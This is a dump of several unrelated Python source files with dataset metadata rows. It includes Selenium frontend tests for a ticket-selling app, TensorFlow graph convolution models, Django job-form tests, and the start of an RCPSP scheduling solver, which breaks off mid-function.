self.type("#quantity_sell", "1")
self.type("#price_sell", "9")
self.click('#submit-sell')
# Assert that the valid error message is shown.
self.assert_text("Ticket price outside of valid range", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_valid_date(self, *_):
""" Date must be given in the format YYYYMMDD (e.g. 20200901)
R4.5
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "ticketname")
self.type("#price_sell", "10")
self.type("#quantity_sell", "1")
self.type("#exp_date_sell", "09212020")
self.click('#submit-sell')
# Assert that the valid error message is shown.
self.assert_text("Invalid ticket date", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_redirect_on_error(self, *_):
""" For any errors, redirect back to / and show an error message
R4.6
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket info, should be redirected to / route
self.type('#name_sell', " invalid ")
self.type("#price_sell", "1")
self.type("#quantity_sell", "0")
self.type("#exp_date_sell", "09212020")
self.click('#submit-sell')
self.assert_element("#welcome-header")
# Assert that the valid error message is shown.
self.assert_text("Hi test_frontend", "#welcome-header")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
@patch('qa327.backend.get_all_tickets', return_value=test_tickets)
@patch('qa327.backend.sell_ticket', return_value=None)
def test_sell_ticket_posted(self, *_):
""" The added new ticket information will be posted on the user profile page
R4.7
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket info, should be redirected to / route
self.type('#name_sell', "t1")
self.type("#price_sell", "100")
self.type("#quantity_sell", "2")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
self.assert_element("#welcome-header")
# Assert that the valid error message is shown.
self.assert_text("Hi test_frontend", "#welcome-header")
| 39.052434
| 177
| 0.624245
| 1,331
| 10,427
| 4.740045
| 0.13148
| 0.065938
| 0.051355
| 0.064194
| 0.790458
| 0.782691
| 0.782691
| 0.779363
| 0.768585
| 0.763512
| 0
| 0.028757
| 0.246284
| 10,427
| 266
| 178
| 39.199248
| 0.774017
| 0.22739
| 0
| 0.713376
| 0
| 0
| 0.31874
| 0.099057
| 0
| 0
| 0
| 0
| 0.070064
| 1
| 0.044586
| false
| 0.070064
| 0.044586
| 0
| 0.095541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
45f93a2bda07de8f4abd899242db5be0fc3605b8
| 217
|
py
|
Python
|
flatdata-py/flatdata/lib/__init__.py
|
heremaps/flatdata
|
42e62c00a25d9b65930c90044578a583efb6ed6d
|
[
"Apache-2.0"
] | 140
|
2018-01-26T21:59:38.000Z
|
2022-02-17T10:23:29.000Z
|
flatdata-py/flatdata/lib/__init__.py
|
VeaaC/flatdata
|
5df78d89938dbbd1566fa85d417b9674ef402561
|
[
"Apache-2.0"
] | 114
|
2018-01-26T17:49:20.000Z
|
2021-11-26T13:27:08.000Z
|
flatdata-py/flatdata/lib/__init__.py
|
VeaaC/flatdata
|
5df78d89938dbbd1566fa85d417b9674ef402561
|
[
"Apache-2.0"
] | 22
|
2018-01-26T16:51:24.000Z
|
2021-04-27T13:32:44.000Z
|
from . import structure
from . import resources
from . import archive
from . import archive_builder
from . import file_resource_writer
from . import errors
from . import resource_storage
from . import flatdata_writer
| 24.111111
| 34
| 0.815668
| 29
| 217
| 5.931034
| 0.413793
| 0.465116
| 0.197674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147465
| 217
| 8
| 35
| 27.125
| 0.92973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
45fb72d016214e16e99543cf110011604a9f8891
| 140
|
py
|
Python
|
maskflow/utils/__init__.py
|
hadim/maskflow
|
6a70725ba26c6e65189936fd5c242c5ab15d6952
|
[
"BSD-3-Clause"
] | 3
|
2018-11-03T20:01:12.000Z
|
2019-05-20T12:57:51.000Z
|
maskflow/utils/__init__.py
|
hadim/maskflow
|
6a70725ba26c6e65189936fd5c242c5ab15d6952
|
[
"BSD-3-Clause"
] | null | null | null |
maskflow/utils/__init__.py
|
hadim/maskflow
|
6a70725ba26c6e65189936fd5c242c5ab15d6952
|
[
"BSD-3-Clause"
] | null | null | null |
from .download import download_zip
from .download import download_file
from .archive import user_data_dir
from .archive import open_archive
| 28
| 35
| 0.857143
| 21
| 140
| 5.47619
| 0.47619
| 0.208696
| 0.313043
| 0.452174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 140
| 4
| 36
| 35
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
346894f243d80fc70f671a8b3e29acf9c489fc8a
| 16,307
|
py
|
Python
|
Code_models.py
|
KampfWut/MORE
|
2b42764812becfa29e0f32f033427e76d5dfe9a0
|
[
"MIT"
] | 2
|
2021-09-30T01:18:23.000Z
|
2021-12-08T06:04:43.000Z
|
Code_models.py
|
KampfWut/MORE
|
2b42764812becfa29e0f32f033427e76d5dfe9a0
|
[
"MIT"
] | null | null | null |
Code_models.py
|
KampfWut/MORE
|
2b42764812becfa29e0f32f033427e76d5dfe9a0
|
[
"MIT"
] | null | null | null |
#-------------------------- import package --------------------------#
from Code_layers import *
from Code_metrics import *
#-------------------------- global variable --------------------------#
flags = tf.app.flags
FLAGS = flags.FLAGS
#--------------------------- main function ---------------------------#
class Model(object):
def __init__(self, **kwargs):
allowed_kwargs = {'name', 'logging'}
for kwarg in kwargs.keys():
assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg
name = kwargs.get('name')
if not name:
name = self.__class__.__name__.lower()
self.name = name
logging = kwargs.get('logging', False)
self.logging = logging
self.vars = {}
self.placeholders = {}
self.layers = []
self.activations = []
self.inputs = None
self.outputs = None
self.emb = None
self.loss = 0
self.accuracy = 0
self.optimizer = None
self.opt_op = None
def _build(self):
raise NotImplementedError
def build(self):
""" Wrapper for _build() """
with tf.variable_scope(self.name):
self._build()
# Build sequential layer model
self.activations.append(self.inputs)
for layer in self.layers:
hidden = layer(self.activations[-1])
self.activations.append(hidden)
self.outputs = self.activations[-1]
self.emb = self.activations[-2]
# Store model variables for easy access
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
self.vars = {var.name: var for var in variables}
# Build metrics
self._loss()
self._accuracy()
self.opt_op = self.optimizer.minimize(self.loss)
def predict(self):
pass
def _loss(self):
raise NotImplementedError
def _accuracy(self):
raise NotImplementedError
def save(self, sess=None):
if not sess:
raise AttributeError("TensorFlow session not provided.")
saver = tf.train.Saver(self.vars)
save_path = saver.save(sess, "tmp/%s.ckpt" % self.name)
print("Model saved in file: %s" % save_path)
def load(self, sess=None):
if not sess:
raise AttributeError("TensorFlow session not provided.")
saver = tf.train.Saver(self.vars)
save_path = "tmp/%s.ckpt" % self.name
saver.restore(sess, save_path)
print("Model restored from file: %s" % save_path)
class MLP(Model):
def __init__(self, placeholders, input_dim, **kwargs):
super(MLP, self).__init__(**kwargs)
self.inputs = placeholders['features']
self.input_dim = input_dim
# self.input_dim = self.inputs.get_shape().as_list()[1] # To be supported in future Tensorflow versions
self.output_dim = placeholders['labels'].get_shape().as_list()[1]
self.placeholders = placeholders
self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)
self.build()
def _loss(self):
# Weight decay loss
for var in self.layers[0].vars.values():
self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)
# Cross entropy error
self.loss += masked_softmax_cross_entropy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _accuracy(self):
self.accuracy = masked_accuracy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _build(self):
self.layers.append(Dense(input_dim=self.input_dim,
output_dim=FLAGS.hidden1,
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=True,
logging=self.logging))
self.layers.append(Dense(input_dim=FLAGS.hidden1,
output_dim=self.output_dim,
placeholders=self.placeholders,
act=lambda x: x,
dropout=True,
logging=self.logging))
def predict(self):
return tf.nn.softmax(self.outputs)
class GCN(Model):
def __init__(self, placeholders, input_dim, **kwargs):
super(GCN, self).__init__(**kwargs)
self.inputs = placeholders['features']
self.input_dim = input_dim
# self.input_dim = self.inputs.get_shape().as_list()[1] # To be supported in future Tensorflow versions
self.output_dim = placeholders['labels'].get_shape().as_list()[1]
self.placeholders = placeholders
self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)
self.build()
def _loss(self):
# Weight decay loss
for var in self.layers[0].vars.values():
self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)
# Cross entropy error
self.loss += masked_softmax_cross_entropy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _accuracy(self):
self.accuracy = masked_accuracy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _build(self):
self.layers.append(GraphConvolution(input_dim=self.input_dim,
output_dim=FLAGS.hidden1,
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=True,
logging=self.logging))
self.layers.append(GraphConvolution(input_dim=FLAGS.hidden1,
output_dim=self.output_dim,
placeholders=self.placeholders,
act=lambda x: x,
dropout=True,
logging=self.logging))
def predict(self):
return tf.nn.softmax(self.outputs)
class MORE(Model):
def __init__(self, placeholders, input_dim, **kwargs):
super(MORE, self).__init__(**kwargs)
self.inputs = placeholders['features']
self.motifinputs = placeholders['motiffeatures']
self.input_dim = input_dim
# self.input_dim = self.inputs.get_shape().as_list()[1] # To be supported in future Tensorflow versions
self.output_dim = placeholders['labels'].get_shape().as_list()[1]
self.placeholders = placeholders
self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)
self.build()
def _loss(self):
# Weight decay loss
for var in self.layers[0].vars.values():
self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)
# Cross entropy error
self.loss += masked_softmax_cross_entropy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _accuracy(self):
self.accuracy = masked_accuracy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _build(self):
# property_embedding layer
for i in range(0, len(FLAGS.property_embedding_hidden)):
if i == 0:
# print(">> property_embedding Layer-{} dim: {} -> {}".format(i, self.input_dim, FLAGS.property_embedding_hidden[i]))
self.layers.append(GraphConvolution(input_dim=self.input_dim,
output_dim=FLAGS.property_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=True,
logging=self.logging))
else:
# print(">> property_embedding Layer-{} dim: {} -> {}".format(i, FLAGS.property_embedding_hidden[i-1], FLAGS.property_embedding_hidden[i]))
self.layers.append(GraphConvolution(input_dim=FLAGS.property_embedding_hidden[i-1],
output_dim=FLAGS.property_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=False,
logging=self.logging))
# motif_embedding layer
for i in range(0, len(FLAGS.motif_embedding_hidden)):
if i == 0:
# print(">> motif_embedding Layer-{} dim: {} -> {}".format(i, FLAGS.motif_feature_dim, FLAGS.motif_embedding_hidden[i]))
self.layers.append(GraphConvolutionMotifs(input_dim=FLAGS.motif_feature_dim,
output_dim=FLAGS.motif_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=True,
logging=self.logging))
else:
# print(">> motif_embedding Layer-{} dim: {} -> {}".format(i, FLAGS.motif_embedding_hidden[i-1], FLAGS.motif_embedding_hidden[i]))
self.layers.append(GraphConvolutionMotifs(input_dim=FLAGS.motif_embedding_hidden[i-1],
output_dim=FLAGS.motif_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=False,
logging=self.logging))
# Judge embedding dim
if FLAGS.property_embedding_hidden[-1] != FLAGS.motif_embedding_hidden[-1]:
raise Exception('[ERROR] embedding last layer not have same dim!')
if FLAGS.embeding_combination_method == "Connection":
embedding_dim = FLAGS.property_embedding_hidden[-1] * 2
else:
embedding_dim = FLAGS.property_embedding_hidden[-1]
# Integration layer
for i in range(0, len(FLAGS.integration_hidden)):
if i == 0:
# print(">> Integration Layer-{} dim: {} -> {}".format(i, embedding_dim, FLAGS.integration_hidden[i]))
self.layers.append(GraphConvolution(input_dim=embedding_dim,
output_dim=FLAGS.integration_hidden[i],
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=False,
logging=self.logging))
else:
# print(">> Integration Layer-{} dim: {} -> {}".format(i, FLAGS.integration_hidden[i-1], FLAGS.integration_hidden[i]))
self.layers.append(GraphConvolution(input_dim=FLAGS.integration_hidden[i-1],
output_dim=FLAGS.integration_hidden[i],
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=False,
logging=self.logging))
# Judge output layer input dim
if len(FLAGS.integration_hidden) == 0:
out_dim = embedding_dim
else:
out_dim = FLAGS.integration_hidden[-1]
# Output
# print(">> Output Layer dim: {} -> {}".format(out_dim, self.output_dim))
self.layers.append(GraphConvolution(input_dim=out_dim,
output_dim=self.output_dim,
placeholders=self.placeholders,
act=lambda x: x,
dropout=True,
logging=self.logging))
def build(self):
""" Wrapper for _build() """
with tf.variable_scope(self.name):
self._build()
# Build sequential layer model
# 1. property_embedding_hidden layer
self.activations.append(self.inputs)
for i in range(0, len(FLAGS.property_embedding_hidden)):
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[i]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
property_embedding = self.activations[-1]
# print(" property_embedding shape: {}".format(property_embedding.get_shape()))
# 2. motif_embedding_hidden layer
self.activations.append(self.motifinputs)
for i in range(0, len(FLAGS.motif_embedding_hidden)):
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[i + len(FLAGS.property_embedding_hidden)]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
motif_embedding = self.activations[-1]
# print(" motif_embedding shape: {}".format(motif_embedding.get_shape()))
# 3. embedding polymerization
if FLAGS.embeding_combination_method == "Hadamard":
combination = tf.multiply(property_embedding, motif_embedding)
self.activations.append(combination)
elif FLAGS.embeding_combination_method == "Summation":
combination = tf.add(property_embedding, motif_embedding)
self.activations.append(combination)
elif FLAGS.embeding_combination_method == "Connection":
combination = tf.concat([property_embedding, motif_embedding], 1)
self.activations.append(combination)
else:
raise Exception("[ERROR] the embeding_combination_method not exist.")
# print(" combination shape: {}".format(combination.get_shape()))
# 4. Integration layer
for i in range(0, len(FLAGS.integration_hidden)):
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[i + len(FLAGS.property_embedding_hidden) + len(FLAGS.motif_embedding_hidden)]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
# 5. Output layer
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[-1]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
self.outputs = self.activations[-1]
# Store model variables for easy access
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
self.vars = {var.name: var for var in variables}
# Build metrics
self._loss()
self._accuracy()
self.opt_op = self.optimizer.minimize(self.loss)
def predict(self):
return tf.nn.softmax(self.outputs)
#######################################################
| 44.072973
| 155
| 0.523211
| 1,561
| 16,307
| 5.288277
| 0.106983
| 0.058147
| 0.039007
| 0.044094
| 0.816233
| 0.781224
| 0.754815
| 0.717626
| 0.711811
| 0.668928
| 0
| 0.005902
| 0.366162
| 16,307
| 370
| 156
| 44.072973
| 0.792763
| 0.14877
| 0
| 0.708661
| 0
| 0
| 0.034578
| 0.001961
| 0
| 0
| 0
| 0
| 0.003937
| 1
| 0.094488
| false
| 0.003937
| 0.007874
| 0.011811
| 0.129921
| 0.007874
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
347522f1c3db216d74d5b2fab7480a079fc88fce
| 265
|
py
|
Python
|
realDataAcquisition/python/csvIngestor.py
|
samkreter/DataScienceMicroServices
|
b9835380ff3a76688bbb803371169b2fa4c632f9
|
[
"MIT"
] | 7
|
2018-04-15T17:42:13.000Z
|
2020-12-09T23:03:32.000Z
|
realDataAcquisition/python/csvIngestor.py
|
samkreter/DataScienceMicroServices
|
b9835380ff3a76688bbb803371169b2fa4c632f9
|
[
"MIT"
] | 16
|
2018-03-31T17:34:17.000Z
|
2018-04-12T04:28:50.000Z
|
realDataAcquisition/python/csvIngestor.py
|
samkreter/DataScienceMicroServices
|
b9835380ff3a76688bbb803371169b2fa4c632f9
|
[
"MIT"
] | 2
|
2018-04-17T19:52:33.000Z
|
2018-04-17T19:52:56.000Z
|
import requests
import json
import logging
import pandas as pd
#Get data ingestions
def getZipFiles():
logging.critical("Not Implememented")
def unZipFiles():
logging.critical("Not Implemented")
def cleanData():
logging.critical("Not Implemented")
| 15.588235
| 41
| 0.74717
| 31
| 265
| 6.387097
| 0.580645
| 0.227273
| 0.272727
| 0.292929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158491
| 265
| 16
| 42
| 16.5625
| 0.887892
| 0.071698
| 0
| 0.2
| 0
| 0
| 0.193416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| true
| 0
| 0.4
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cad6846735830cbb526c2aae2a6a9a95c2578ff9
| 8,330
|
py
|
Python
|
aldryn_jobs/tests/test_forms.py
|
what-digital/aldryn-jobs
|
7704b475f691d609fdd65a2aa1925c488d273e59
|
[
"BSD-3-Clause"
] | 1
|
2021-04-29T09:42:01.000Z
|
2021-04-29T09:42:01.000Z
|
aldryn_jobs/tests/test_forms.py
|
what-digital/aldryn-jobs
|
7704b475f691d609fdd65a2aa1925c488d273e59
|
[
"BSD-3-Clause"
] | 2
|
2019-02-27T11:20:16.000Z
|
2019-02-27T11:21:36.000Z
|
aldryn_jobs/tests/test_forms.py
|
SocialSchools/socialschools-jobs
|
8e79e0a792c8fdd85c6860f89dbbd47c6ca8b7ce
|
[
"BSD-3-Clause"
] | 2
|
2020-03-30T09:26:19.000Z
|
2020-03-30T10:48:36.000Z
|
from ..models import JobCategory
from ..forms import JobCategoryAdminForm, JobOpeningAdminForm
from .base import JobsBaseTestCase
class JobCategoryAdminFormTestCase(JobsBaseTestCase):
def test_form_not_valid_if_app_config_not_selected(self):
# and it produces validation error instead of 500
data = {
'name': self.default_category_values['en']['name'],
'slug': 'default-category-different-slug',
}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('app_config', form.errors.keys())
def test_form_not_valid_no_data_provided_at_all(self):
# and it produces validation error instead of 500
data = {}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('app_config', form.errors.keys())
self.assertIn('name', form.errors.keys())
def test_form_not_valid_if_only_app_config_was_selected(self):
# and it produces validation error instead of 500
data = {'app_config': self.app_config.pk}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('name', form.errors.keys())
def test_form_not_valid_if_only_name_was_provided(self):
# and it produces validation error instead of 500
data = {'name': self.default_category_values['en']['name']}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('app_config', form.errors.keys())
def test_form_not_valid_if_only_slug_was_provided(self):
# and it produces validation error instead of 500
data = {
'slug': 'default-category-different-slug',
}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('name', form.errors.keys())
self.assertIn('app_config', form.errors.keys())
def test_form_valid_for_same_name_in_different_app_config(self):
other_config = self.create_config(namespace='other_config')
data = {
'app_config': other_config.pk,
'name': self.default_category_values['en']['name'],
'slug': 'default-category-different-slug',
}
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertEqual(new_category.slug,
data['slug'])
self.assertEqual(new_category.app_config, other_config)
def test_form_valid_for_same_slug_in_different_app_config(self):
# depends on decision if we will remove uniqueness of slug per language
other_config = self.create_config(namespace='other_config')
data = {
'name': 'different name',
'slug': self.default_category_values['en']['slug'],
'app_config': other_config.pk,
}
data.update(self.default_category_values['en'])
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertEqual(new_category.slug,
data['slug'])
self.assertEqual(new_category.app_config, other_config)
def test_form_is_valid_for_unique_name(self):
# form should allow unique names
data = {
'name': 'Unique name for category',
'app_config': self.app_config.pk
}
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertGreater(len(new_category.slug), 0)
self.assertEqual(new_category.app_config, self.app_config)
def test_form_is_valid_for_unique_slug(self):
# form should allow unique names
data = {
'name': 'Unique name for category with slug',
'slug': 'unique-name-for-category-with-slug',
'app_config': self.app_config.pk
}
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertGreater(len(new_category.slug), 0)
self.assertEqual(new_category.app_config, self.app_config)
class JobOpeningAdminFormTestCase(JobsBaseTestCase):
def test_form_not_valid_if_category_not_selected(self):
# and it produces validation error instead of 500
self.create_default_job_opening(translated=True)
# provide same data as for default opening
data = {
'title': self.default_job_values['en']['title'],
'slug': self.default_job_values['en']['slug'],
}
form = JobOpeningAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('category', form.errors.keys())
def test_form_valid_for_same_name_in_different_category_app_config(self):
self.create_default_job_opening(translated=True)
# prepare category with other app config
other_config = self.create_config(namespace='other_config')
other_category = JobCategory.objects.create(
name='Other category', app_config=other_config)
data = {
'category': other_category.pk,
'title': self.default_job_values['en']['title'],
'slug': 'default-category-different-slug',
}
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertEqual(new_opening.slug,
data['slug'])
self.assertEqual(new_opening.category, other_category)
def test_form_valid_for_same_slug_in_different_category(self):
self.create_default_job_opening(translated=True)
# depends on decision if we will remove uniqueness of slug per language
other_config = self.create_config(namespace='other_config')
other_category = JobCategory.objects.create(
name='Other category', app_config=other_config)
data = {
'title': 'different title',
'slug': self.default_job_values['en']['slug'],
'category': other_category.pk,
}
data.update(self.default_job_values['en'])
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertEqual(new_opening.slug,
data['slug'])
self.assertEqual(new_opening.category, other_category)
def test_form_is_valid_for_unique_name(self):
# form should allow unique names
data = {
'title': 'Unique title for opening',
'category': self.default_category.pk
}
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertGreater(len(new_opening.slug), 0)
self.assertEqual(new_opening.category, self.default_category)
def test_form_is_valid_for_unique_slug(self):
# form should allow unique names
data = {
'title': 'Unique title for opening with slug',
'slug': 'unique-title-for-opening-with-slug',
'category': self.default_category.pk
}
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertGreater(len(new_opening.slug), 0)
self.assertEqual(new_opening.category, self.default_category)
| 40.241546
| 79
| 0.632173
| 941
| 8,330
| 5.350691
| 0.092455
| 0.046475
| 0.0715
| 0.051639
| 0.915194
| 0.877259
| 0.857001
| 0.834161
| 0.767031
| 0.745382
| 0
| 0.003596
| 0.265546
| 8,330
| 206
| 80
| 40.436893
| 0.819385
| 0.093758
| 0
| 0.75
| 0
| 0
| 0.099097
| 0.025505
| 0
| 0
| 0
| 0
| 0.280488
| 1
| 0.085366
| false
| 0
| 0.018293
| 0
| 0.115854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
caf2946c845d0328c9fc0a2a2c9338921e0038d8
| 35,225
|
py
|
Python
|
skdecide/builders/discrete_optimization/rcpsp/solver/rcpsp_lp_solver.py
|
galleon/bug-free-invention
|
37bcea112da39d1390ff2b30951b36ee5dbc0e6d
|
[
"MIT"
] | null | null | null |
skdecide/builders/discrete_optimization/rcpsp/solver/rcpsp_lp_solver.py
|
galleon/bug-free-invention
|
37bcea112da39d1390ff2b30951b36ee5dbc0e6d
|
[
"MIT"
] | null | null | null |
skdecide/builders/discrete_optimization/rcpsp/solver/rcpsp_lp_solver.py
|
galleon/bug-free-invention
|
37bcea112da39d1390ff2b30951b36ee5dbc0e6d
|
[
"MIT"
] | null | null | null |
from itertools import product
from typing import List, Dict, Union
from mip import Model, xsum, BINARY, MINIMIZE, CBC, GRB, Var, INTEGER
from skdecide.builders.discrete_optimization.generic_tools.do_problem import build_evaluate_function_aggregated, ParamsObjectiveFunction, \
ModeOptim, get_default_objective_setup, build_aggreg_function_and_params_objective
from skdecide.builders.discrete_optimization.generic_tools.lp_tools import MilpSolver
from skdecide.builders.discrete_optimization.generic_tools.lp_tools import ParametersMilp
from skdecide.builders.discrete_optimization.generic_tools.mip.pymip_tools import MyModelMilp
from skdecide.builders.discrete_optimization.generic_tools.result_storage.result_storage import ResultStorage
from skdecide.builders.discrete_optimization.rcpsp.rcpsp_model import RCPSPSolution, SingleModeRCPSPModel,\
MultiModeRCPSPModel, RCPSPModelCalendar, PartialSolution
from skdecide.builders.discrete_optimization.rcpsp.solver.rcpsp_pile import PileSolverRCPSP, GreedyChoice, PileSolverRCPSP_Calendar
from enum import Enum
import random
import gurobi
class LP_RCPSP_Solver(Enum):
GRB = 0
CBC = 1
class LP_RCPSP(MilpSolver):
def __init__(self, rcpsp_model: SingleModeRCPSPModel,
lp_solver=LP_RCPSP_Solver.CBC,
params_objective_function: ParamsObjectiveFunction=None, **kwargs):
self.rcpsp_model = rcpsp_model
self.model: Model = None
self.lp_solver = CBC
if lp_solver == LP_RCPSP_Solver.GRB:
self.lp_solver = GRB
elif lp_solver == LP_RCPSP_Solver.CBC:
self.lp_solver = CBC
self.variable_decision = {}
self.constraints_dict = {}
self.constraints_dict["lns"] = []
self.aggreg_from_sol, self.aggreg_dict, self.params_objective_function = \
build_aggreg_function_and_params_objective(problem=self.rcpsp_model,
params_objective_function=
params_objective_function)
# self.description_variable_description = {}
# self.description_constraint = {}
def init_model(self, **args):
greedy_start = args.get("greedy_start", True)
start_solution = args.get("start_solution", None)
verbose = args.get("verbose", False)
if start_solution is None:
if greedy_start:
if verbose:
print("Computing greedy solution")
greedy_solver = PileSolverRCPSP(self.rcpsp_model)
store_solution = greedy_solver.solve(greedy_choice=GreedyChoice.MOST_SUCCESSORS)
self.start_solution = store_solution.get_best_solution_fit()[0]
makespan = self.rcpsp_model.evaluate(self.start_solution)["makespan"]
else:
if verbose:
print("Get dummy solution")
solution = self.rcpsp_model.get_dummy_solution()
self.start_solution = solution
makespan = self.rcpsp_model.evaluate(solution)["makespan"]
else:
self.start_solution = start_solution
makespan = self.rcpsp_model.evaluate(start_solution)["makespan"]
